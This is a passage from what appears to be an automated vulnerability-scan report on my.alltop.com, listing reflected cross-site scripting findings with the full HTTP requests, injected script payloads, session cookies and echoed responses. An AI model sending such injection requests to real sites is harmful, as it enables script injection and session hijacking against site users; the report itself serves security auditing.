Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:39 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:39 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E?16ddb"><script>alert(1)</script>da6720f4a77=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.96. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c063"><script>alert(1)</script>9c9fdc8481d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e5c063"><script>alert(1)</script>9c9fdc8481d/%22ns=%22netsparker(0x000196) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e5c063"><script>alert(1)</script>9c9fdc8481d/%22ns=%22netsparker(0x000196)" method="post" accept-charset="utf-8">
...[SNIP]...

1.97. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a509"><script>alert(1)</script>0e255d375af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%22ns8a509"><script>alert(1)</script>0e255d375af=%22netsparker(0x000196) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%22ns8a509"><script>alert(1)</script>0e255d375af=%22netsparker(0x000196)" method="post" accept-charset="utf-8">
...[SNIP]...

1.98. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce099"><script>alert(1)</script>e9db9f13b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%22ns=%22netsparker(0x000196)?ce099"><script>alert(1)</script>e9db9f13b=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%22ns=%22netsparker(0x000196)?ce099"><script>alert(1)</script>e9db9f13b=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.99. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59182"><script>alert(1)</script>e874764ccd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e59182"><script>alert(1)</script>e874764ccd6/%2522ns%253D%2522netsparker%25280x0001A8%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e59182"><script>alert(1)</script>e874764ccd6/%2522ns%253D%2522netsparker%25280x0001A8%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.100. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36afd"><script>alert(1)</script>1bea4c37bfc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)36afd"><script>alert(1)</script>1bea4c37bfc HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)36afd"><script>alert(1)</script>1bea4c37bfc" method="post" accept-charset="utf-8">
...[SNIP]...

1.101. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac09"><script>alert(1)</script>90ad980318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)?cac09"><script>alert(1)</script>90ad980318c=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)?cac09"><script>alert(1)</script>90ad980318c=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.102. http://my.alltop.com/alpha/f ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001B5)</script> request parameter is copied into the HTML document as plain text between tags. The payload 5ba6a<script>alert(1)</script>3a9b6533f38 was submitted in the '"--></style></script><script>netsparker(0x0001B5)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?'"--></style></script><script>netsparker(0x0001B5)</script>5ba6a<script>alert(1)</script>3a9b6533f38 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>5ba6a<script>alert(1)</script>3a9b6533f38" method="post" accept-charset="utf-8">
...[SNIP]...

1.103. http://my.alltop.com/alpha/f [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40afb"><script>alert(1)</script>655b90c610e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f40afb"><script>alert(1)</script>655b90c610e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
